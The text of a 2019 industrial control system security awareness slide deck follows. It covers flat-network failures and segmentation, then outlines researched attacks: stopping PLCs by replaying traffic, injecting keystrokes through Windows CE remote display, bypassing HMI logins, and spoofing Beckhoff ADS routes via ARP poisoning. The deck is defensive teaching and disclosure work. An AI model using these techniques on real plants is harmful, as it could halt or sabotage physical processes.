IC4 Awareness Session › pdf › 3_20191015-ICS-Awareness.pdf · • DistributedControlSystems(DCS), • ProcessControlSystems(PCS), ... Lessons learned will be demonstrated on:

INDUSTRIAL CONTROL & COMMUNICATION

COMPETENCE CENTER | HOWEST – UGENT

Oktober 15th, 2019

1

ARTIFICIAL INTELLIGENCE BLOCKCHAIN CYBER SECURITY

E D U C AT I O N - R E S E A R C H - C O N S U LT I N G

IC4 Awareness Session

Ing. Tijl DeneutIng. Tinus Umans

2

Oktober 15th, 2019

Who am I?Tijl Deneut

▪ Lecturer at Howest University College• Bruges / Brugge: Toegepaste Informatica, traject Cyber Crime Professional

▪ Researcher at Howest & Ghent University• Currently: Industrial Security

▪ Certificates (o.a.)• VMware Certified Professional & IT Academy Instructor

• Cisco Certified Instructor for CCNA1-4 & CCNA Security

• IBM Certified Business Common Associate & Professional on business continuity

• EC-Council Certified Ethical Hacker (CEH/Practical) plus Instructor (CEI)

▪ [email protected]

▪ www.linkedin.com/in/tijldeneut

5

Oktober 15th, 2019

What are “Industrial Control Systems”

“An ICS is a broad class of command and control networks andsystems thatareusedtosupport all types of industrial processes. “

They include avariety ofsystemtypes including:• Supervisory ControlAndDataAcquisition (SCADA) systems,• Distributed ControlSystems(DCS),• ProcessControlSystems(PCS),• Safety Instrumented Systems(SIS),• smaller control systems configurations such as Programmable

LogicControllers (PLC’s).

The term “OT” is actually never used on the factory floor. It is onlyusedbyITpeople todistinguish themselves …

6

Oktober 15th, 2019

Nuclear Oil & Gas Transportation Water

HVAC Building Automation

Manufacturing Process Industry

Petrochemical

Food IndustryDiscrete

Manufacturing

Green Energy Water LocksDams

Stand-alone MachinesGenerators

Pharmaceutical

Where can I find ICS systems?

7

Oktober 15th, 2019

How does that look like?

Industrial Control SystemsOffice

Supervision Network Production Network

8

Oktober 15th, 2019

Industrial Control SystemsOffice

Supervision Network Production Network

ERP server

Production management systems

Corporate IT

WAN

SupervisionConsoles

Engineering Stations

SCADA Servers

PLC

HMI

Drives

Industrial networks

Sensors Robots

Historians / Logging Server

What’s inside?

9

Oktober 15th, 2019

Within our project, we had a lot of ICS factories and companies asking our help. These are the lessons we’ve learned from real companies, real cases…

TOPIC FOR TODAY:

Lessons LearnedFrom Troubleshooting REAL companies

Lessons learned will be demonstrated on:

10

Oktober 15th, 2019

WE FAKE YOUR TILESFICTILE

11

Oktober 15th, 2019

Introducing our Fake Company

WE FAKE YOUR TILESFICTILE

12

Oktober 15th, 2019

Management of Security Vulnerabilities in Industrial Networks

13

Oktober 15th, 2019

Enable Remote Monitoring of Industrial Equipment

Presses

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

Furnace Dosing equipment

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

14

Oktober 15th, 2019

In Real Life, three major kinds of “problems”

1. Non-human, accidental issues• And how FicTile “solved” it

2. Human on the job, accidental issues• And how FicTile “solved” it

3. Human recreational, accidental issues• And how FicTile“solved” it

15

Oktober 15th, 2019

Scenario 1

Please help: “PLC of dosing equipment goes into stop mode every day at 4 AM”

Tijl DeneutIT Manager

16

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

TCP-broadcastsBig TCP Window

Presses Furnace Dosing equipment

PLC continuously goes in stop mode

17

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

TCP-broadcastsBig TCP Window

Presses Furnace Dosing equipment

PLC continuously goes in stop mode“Solution”: new switch that filters out these types of broadcasts

18

Oktober 15th, 2019

Scenario 2

Please help: “Dosing equipment mysteriously goes into error and can not be restarted”

Tijl DeneutIT Manager

19

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

PLC program downloadedto PLC in wrong hall

Presses Furnace Dosing equipment

PRES-1

Dosing equipment mysteriously goes into error

20

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

Presses Furnace Dosing equipment

PRES-1

OT training to createawareness

Dosing equipment mysteriously goes into error“Solution”: Organize a training to create awareness for PLC programmers

21

Oktober 15th, 2019

Scenario 3

Please help: “USB stick causes a complete shutdown of production”

Tijl DeneutIT Manager

22

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

Presses Furnace Dosing equipment

Thumb drive causes a shutdown of production

23

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)Antivirusinstallation

Presses Furnace Dosing equipment

Thumb drive causes a shutdown of production“Solution”: Install a new and expensive Antivirus program on the laptop

24

Oktober 15th, 2019

The Real Problem?

The so-called “flat” network

o One “broadcast” domaino The differences in IP addresses are only on papero Each piece of equipment has a direct connection with any other deviceo No opportunity for segmentation in zones or areaso No control on network traffic

An untrusted network!

- Not safe: bad configurations or errors have an influence on the whole network

- Not secure: illegitimate access is not manageable

25

Oktober 15th, 2019

Some Manufacturers Guidelines

26

Oktober 15th, 2019

The (starting) solution?

Solution: network segmentation

Option 1 Apply routers in front of each hall or even equipment

- Configure traffic control for each router- Broadcast traffic stops at the router- Fairly expensive, depends on the network size (in particular industrial routers)- Additional wiring, depends on the current infrastructure- In case of migration, each equipment needs to be changed separately

27

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

Presses Furnace Dosing equipment

Adding Routers

28

Oktober 15th, 2019

Office / datacenter (10.20.0.0 /16)

P L C

P L C

H M I

192.168.1.0 /24 192.168.2.0 /24 192.168.3.0 /24

H M I

P L C

P L C

P L C

H M I

192.168.1.X /24

192.168.1.Y /24

192.168.2.X /24

192.168.2.Y /24

192.168.2.Z /24 192.168.3.Z /24

192.168.3.Y /24

192.168.3.X /24

Presses Furnace Dosing equipment

Adding Routers

29

Oktober 15th, 2019

The (starting) solution?

Solution: network segmentation

Option 2 Use of VLANs (Physical subdivision on switch)

- Configure traffic control on one location- Broadcast traffic is limited to VLAN- Switches have to support this (managed switches)- Needs to be thought through in advance, if necessary change subnet mask

30

Oktober 15th, 2019

P L C P L C

H M I

10.20.1.0 /16 10.20.2.0 /16 10.20.3.0 /16

H M I

P L C

P L C

P L C

H M I

Office / datacenter (10.20.0.0 /16)

Presses Furnace Dosing equipment

Configuring VLANs

31

Oktober 15th, 2019

P L C P L C

H M I

10.20.2.0 /16 (ID 2000) 10.20.3.0 /16 (ID 3000)

H M I

P L C

P L C

P L C

H M I

10.20.1.0 /16 (ID 1000)

TRUNK

VLAN ID 1000

VLAN ID 2000

VLAN ID 3000

Presses Furnace Dosing equipment

Configuring VLANs, option A (requires extensive config)

Office / datacenter (10.20.0.0 /16)

32

Oktober 15th, 2019

P L C P L C

H M I

10.20.2.0 /16 (ID 2000) 10.20.3.0 /16 (ID 3000)

H M I

P L C

P L C

P L C

H M I

10.20.1.0 /16 (ID 1000)

TRUNK

VLAN ID 1000

VLAN ID 2000

VLAN ID 3000

Presses Furnace Dosing equipment

Configuring VLANs, option B (requires extra cables)

Office / datacenter (10.20.0.0 /16)

33

Oktober 15th, 2019

The other upside: Real Life StatisticsWe assisted some companies making this migration, we have some PRE and POST statistics

Very common in *all* of these companies: redundant traffic

34

Oktober 15th, 2019

Hacker damage …

And am I safe then?Safer, but not secure!

Tijl DeneutIT Manager

35

Oktober 15th, 2019

Why ICS security now?Several migrations have happened over time:

• ±15 years ago: all systems still used fieldbus protocols • There was a movement to Ethernet based protocols

• ±10 years ago: networking became abundant, everything started to become intra connected• Engineers / operators / managers connecting to their

productiondevices from everywhere in the company

• ±5 years ago: the age of IoT, Big Data and Industry 4.0• Engineers / operators / managers want to monitor, manage and connect to their

production devices from at home

Andall thisusingprotocols thatweredeveloped +40years agoandhavezerosupport forsecurity, authentication, encryption … Demo

Modbus on Android

36

Oktober 15th, 2019

Remote access over internet to ICS networks

World of VNC

Public websites

37

Oktober 15th, 2019

Let’s get into the Hacker Mindset

What does a hacker have at his disposal?The internet!

• Explore the possibilities: https://www.shodan.io/explore

• Free reports: https://www.shodan.io/report/YV9DdaM0 and https://www.shodan.io/report/3HyjE1Lu

• Also for industrial systems: icsmap and radar or general map

38

Oktober 15th, 2019

Let’s get into the Hacker Mindset

February 2017June 2019

39

Oktober 15th, 2019

Management of Security Vulnerabilities in Industrial Networks

“Hackers on our network”What can they do?

Tijl DeneutIT Manager

40

Oktober 15th, 2019

Let’s get into the Hacker Mindset

Industrial Networks, have some serious security drawbacks.

• Open and insecure protocols

• The only supported software is outdated

• Life expectancy and update

• Slow or non-existent adaptation of security issues

• Hard to get hardware, so not well researched … (“security by obscurity”has a new meaning)

Let’s take a look at some issues that describe these drawbacks

41

Oktober 15th, 2019

Protocols, protocols, protocols ☺

Industrial devices rely on oldand insecureprotocols.

So we did some research to investigate these protocols …

-Phoenix Contact: completely proprietary, not even Wireshark has any idea what we are dealing with

42

Oktober 15th, 2019

Research? How?• Downloading the original software

• Usually demo versions, freely downloadable

• Connecting to the PLC • Usually more or less just entering the IP address• Or sometimes not even that

• Start Wireshark

• Click “Stop”, click “Reset”, click “Cold”

• Replay captured traffic using Python

• Done … DemoStop & Start Phoenix Contact

43

Oktober 15th, 2019

Discovery?➢ Many ICS vendors (including Schneider, Beckhoff, Siemens …) use a custom discovery implementation

➢ So always use the technology as provided by the manufacturer

- It is a proven system which always works ☺- These tools exist for about every OEM

➢ An example: the Siemens Primary Setup Tool(or Proneta or TIA Portal)- It scans the network for Siemens devices- And uses a pretty simple protocol to do so:

Profinet Discovery Protocol

➢ As it seems, there is somewhat of an issue with the Profinet Discovery Protocol- We did some research …

DemoFullSiemensScan.py

44

Oktober 15th, 2019

An example: Mitsubishi Protocol Analysis

45

Oktober 15th, 2019

Programming a Mitsubishi PLC

46

Oktober 15th, 2019

Scanning for Mitsubishi PLCs

47

Oktober 15th, 2019

Broadcasts? But why?

Many protocols have been created with the ease of the engineers in mind:

• Sending all packets to 255.255.255.255 / FF:FF:FF:FF:FF:FF is easy to use because the workstation and PLC do nothave to be in the same subnet to be able to communicate to each other• So this protocol works “Out-Of-The-Box”• So there is no need to have a valid IP address on your computer, easy right?

• Unfortunately this also means that all traffic is being delivered to every other device in the network• Problem anyone?

• Please note: once the workstation and PLC are in the same subnet, TCP is used and a more “regular” way of communicating occurs

48

Oktober 15th, 2019

Normal protocol

49

Oktober 15th, 2019

Creating scripts

Conclusion: access to the network is game over for these PLC’s DemoMitsubishiScan & MitsubishiSetState

50

Oktober 15th, 2019

The issue?➢ As often: user friendliness is the big enemy of security

➢ If it easy to use for the Operator/Engineer, then it is easy to use for hackers➢ As an example, let’s look at our GitHub page (https://github.com/tijldeneut)

51

Oktober 15th, 2019

Mitsubishi PLC Software is called “GX Works”

52

Oktober 15th, 2019

Other general issue: limited OS support

53

Oktober 15th, 2019

An example of outdated software: “Windows CE”

Windows Compact Embedded

• WinCE 4.0: 2002/01• WinCE 5.0: 2004/08• WinCE 6.0: 2006/06• WinCE 7.0: 2011/03

Has retired in 2013.

Microsoft says “do not use”!

54

Oktober 15th, 2019

Windows CE, exampleFrom zero to Remote Code Execution in less than 10 minutesA reverse engineering example …

Protocol of choice? Microsoft Compact Embedded Remote Display (CERDisp)

55

Oktober 15th, 2019

So what is this protocol?

The CERDisp protocol is used to take over the display of any Windows CE device that is running this service.→An example in ICS would be certain Beckhoff PLC’s.

From the manual (https://infosys.beckhoff.com/english.php?content=../content/1033/cx9000_hw/html/cx9000_updateimage.htm)

56

Oktober 15th, 2019

Let’s begin… Capturing some data

- Starting a normal session, logging in, seeing desktop …

57

Oktober 15th, 2019

Analyzing the protocol

- Let’s look in detail at some packets That’s a “banner grab” ☺

58

Oktober 15th, 2019

Analyzing the protocol- Next packet … We can make a brute forcer ☺

59

Oktober 15th, 2019

Analyzing the protocol- Last Piece, getting keys

Key sequence == Windows, arrow up, arrow up, enter, T, e, s, t, enter

00015b0001015b000001260001012600000126000101260000010d0001010d000001100000015400010154000101100000014500010145000001530001015300000154000101540000010d0001010d00

00015b0001015b00

0001260001012600

0001260001012600

00010d0001010d00

00011000

0001540001015400

01011000

0001450001014500

0001530001015300

0001540001015400

00010d0001010d00

60

Oktober 15th, 2019

Analyzing the protocol

- Last Piece, identifying keysAfter some “research” (or in other words, trial and error), we made these conclusions:

• 0001+keycode+00 == key down• 0101+keycode+00 == key down• (Good) response from server is always ‘03000000’

Where: • 5b==Winkey• 10==shift• 25==arrleft, 26==arrup, 27==arrright, 28==arrdown• 12==space• 0d==enter• 62==1, 63==2, 64==3, 65==4, …, 69==9, 6a==0• 41==a, 42==b 43==c, 44==d …→There seems to be some pattern here

61

Oktober 15th, 2019

Let’s send the keys to restart the device using a Python script

DemoCERDisplay-ResetDevice.py

62

Oktober 15th, 2019

So what do we have now

We can now scan, enumerate, brute force and sniff this protocol

- However, during this investigation we discovered something very strange:

→ If we use the script to send a WRONG PASSWORD, we get a ‘000000’ response, but the connection is not killed.

→ Turns out that the password verification is on the client side. So it is up to the cerhost.exe to stop the connection in case the wrong password is given.

→ So we perform some IDA Pro / Debugging Fu

63

Oktober 15th, 2019

“Hacking CERDisp”

DemoCERHost.exe

65

Oktober 15th, 2019

Vendor response to this issue

66

Oktober 15th, 2019

This OS is found not only in industrial environments• Old Automated Teller Machines (ATMs)

• Gas Stations kiosks and payment

• Busses / Public transport

• Barcode Scanners in stores & shops

• Charging Stations for Electric Cars

• …

CARS?

67

Oktober 15th, 2019

Finally: some examples security-not-done-right

68

Oktober 15th, 2019

Siemens VulnerabilitiesSiemens is one the best students in the class

• They have a devoted ProductCERT (Cyber Emergency Response Team)

• Response to our requests fairly quickly

• Fixes issues, and makes proper notes on their website• https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html

• https://cert-portal.siemens.com/productcert/pdf/ssa-884497.pdf→ (thanks to Hendrik Derre)

69

Oktober 15th, 2019

Phoenix Contact HMI

In cooperation with Lars De Maesschalck, Michael De Vos and Robbe Vuylsteke

70

Oktober 15th, 2019

The WebVisit software

→ Works by creating a Java applet running on a webserver on the PLC.→ This applet can read and write

certain tags from the PLC program to operate a PLC→ And it can then be opened and run in a browser

(e.g. a HMI device)

The WebVisit software

- Until 2014 this software was not secure and every single visitor of the website was just able to interact with the Java applet

- However: in 2014, a version was created with password implementation

- A total of four passwords can be configured to provide access to the applet- And in 2017, the most recent version of this software no longer stores clear text passwords …

71

Oktober 15th, 2019

Demo Overview

- Accessing the HMI without passwordshttps://photubias.stackstorage.com/s/G9EEzOeNvI5QeEW

- Performing an Unauthenticated Password Retrieval on newer versionhttps://photubias.stackstorage.com/s/2vta8JPq0c6zMtF

- Performing a Hash Retrieval plus crackhttps://photubias.stackstorage.com/s/CboS1iynnX6YVFD

- And finally: ignoring the entire login screen all togetherhttps://photubias.stackstorage.com/s/CHrrdrsNvkuzwor

INDUSTRIAL CONTROL & COMMUNICATION

COMPETENCE CENTER | HOWEST – UGENT

Oktober 15th, 2019

74

Twincat ADS vulnerabilitiesCVE-2019-16871

Ing. Tinus Umans

75

Oktober 15th, 2019

Who am I?Tinus Umans

▪ Engineer Industrial Automation

▪ Researcher at Ghent University campus Kortrijk• Industrial Security

• Vision & RFID applications

▪ [email protected]

▪ www.linkedin.com/in/Tinus-Umans

76

Oktober 15th, 2019

More Money, More Security?

• “But security also comes with a price”

• CX9xxx • Windows CE• Cheaper• Notsecure at all

• CX5xxx • Windows 10 LTSC• More expensive

• Let’s findout…

77

Oktober 15th, 2019

Beckhoff Basics• Beckhoff uses Windows Operating Systems on their controllers• Engineers use Microsoft Visual Studioas the default programming environment• The only thing Engineers have to do to start programming controllers is install the

TwinCAT 3 eXtended Automation Engineering software• Free to download

• www.beckhoff.com/twincat3• Latest version : 3.1.4024.0 (build date 2019-07-24)

• IEC 61131-3 standard: Ladder, Function Block Diagram, Structured Text, …

78

Oktober 15th, 2019

Protocol Communication

• TwincatAMS/ADS protocol• AMS ( Automation Machine Specification )

• AMS Address• IP address + “.1.1” ( 10.0.0.35.1.1 )

• AMS Port• Depends on function

• Data • ADS ( Automation Device Specification )

• CommandsforPLC (later more)

79

Oktober 15th, 2019

Routes• Routes

• Combination of AMS Address& IP address• Acts like a whitelist : Onlyknownroutes cancommunicate• Addroutes withWindows Credentials

80

Oktober 15th, 2019

Device Discovery

Just like almost every Industrial Vendor, Beckhoff devices respond to certain discovery packets.This is a different protocol altogether (because routes are non existent at this time), so Information Disclosure guaranteed …

→UDP/48899

Adding Routes Remotely?

→ Is also done via AMS-over-UDP→Adding Routes requires (any) local Windows credential: can be sent clear text or encrypted

81

Oktober 15th, 2019

Secure?

So as it turns out: the only security measure for ADS communication is the IP adres that is in the list of Routes …→ So can we bypass a restriction that is based purely on source IP Address?

Solution: IP Spoofing

By sending packets coming from different IP addresses we can “discover” the possible routes that are present.

Done in two parts:1. ARP Poison2. ADS Verification packet

82

Oktober 15th, 2019

1. ARP Poisoning?

Problem: if a response is triggered coming from a certain IP address, that response will be sent to the device that actually has that IP address. (e.g. by performing an ARP request for that device).

So we need to tell the target our MAC address for that specific IP address-> This is called “ARP Spoofing”

83

Oktober 15th, 2019

2. Sending a single ADS packet

This too has to be “spoofed”, so using a fake IP address as a source for this packet

84

Oktober 15th, 2019

DEMO

85

Oktober 15th, 2019

Beckhoff Spoofing

• Added a route WITHOUT authentication

• We are now essentially a different ADS device: an IPC, an engineering PC, an HMI …

• TwinCATADS is a language that is defined by Function Blocks, to perform actions on devices.

• Examples of those actions are• Reading/Writing PLC-variables• Setting the Controller state to Stop, Run or Config mode• Downloading the internal PLC-project• (Re)Programming the internal PLC-project• And adding routes without any additional authentication• … And as it turns out: a lot more …

86

Oktober 15th, 2019

More ADS actions? There is a website for that:https://infosys.beckhoff.com/english.php?content=../content/1033/tcplclib_tc2_utilities/9007199289758859.html&id=

87

Oktober 15th, 2019

Want to go further?There is a website for that:https://infosys.beckhoff.com/english.php?content=../content/1033/tcplclib_tc2_utilities/9007199289758859.html&id=

88

Oktober 15th, 2019

A little bonus

We can use this to bypass a Kiosk System too

DEMO

89

Oktober 15th, 2019

Conclusion : Remote Code Execution vulnerability

The prerequisites for this attack:• Engineering system (e.g. laptop) used to program a Beckhoff Device (IPC/HMI/…)• Has the TwinCAT Runtime installed

• Which is a requirement when programming with Beckhoff

• Ports open in Firewall (UDP/48899 or TCP/48898)• Default open & necessary to add remote routes

→To add a route from an IPC to a workstation, the ports above mustbe open!! (for some reason)

• No longer necessary once the remote routes are added• At least one route configured

• Which is required to communicate with remote devices

Scripts on our Github

90

Oktober 15th, 2019

Are there solutions

• Use a Virtual Machine for running Twincat

• Configure Windows Firewalls

• And the official response from the Beckhoff Product-Security CERT:

“Please refer to Advisory 2017-001”

91

Oktober 15th, 2019

Official Solution

92

Oktober 15th, 2019

Want to know more? Join our project

Innovative Network Monitoring Systems

Cyber Security Solutions forIndustry 4.0

Regulations within theindustrial sector

Or found us at our booth (and join the ICS CTF) ☺

INDUSTRIAL CONTROL & COMMUNICATION

COMPETENCE CENTER | HOWEST – UGENT

Oktober 15th, 2019

93

Want to know more?• There is a 5 -day course (5 weeks, 1 day/week) scheduled, starting November 14th

• Visit www.ic4.befor more information and free newsletter subscriptions• Also follow our blog (www.ic4.be/blog) and vulnerability checklist (checklist.ic4.be)